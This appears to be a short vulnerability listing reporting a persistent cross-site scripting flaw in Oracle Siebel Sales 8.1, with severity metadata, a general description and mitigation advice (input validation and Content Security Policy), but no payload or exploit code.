vendor: Siebel Sales
by: omurugur
CVSS: 7.5 HIGH
Persistent Cross-Site Scripting
CWE: 79
Product Name: Siebel Sales
Affected Version From: Oracle Siebel Sales 8.1
Affected Version To: Oracle Siebel Sales 8.1
Patch Exists: NO
Related CWE: N/A
CPE: a:oracle:siebel_sales:8.1
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: None
2019
Oracle Siebel Sales 8.1 – Persistent Cross-Site Scripting
Oracle Siebel Sales 8.1 is vulnerable to persistent cross-site scripting. An attacker can inject malicious JavaScript into the application by sending a specially crafted POST request. The injected code is stored by the application and executes in the victim's browser when the application is accessed.
Mitigation:
Input validation should be used to prevent malicious code from being injected into the application. Additionally, the application should be configured to use a Content Security Policy (CSP) to prevent malicious code from being executed in the browser.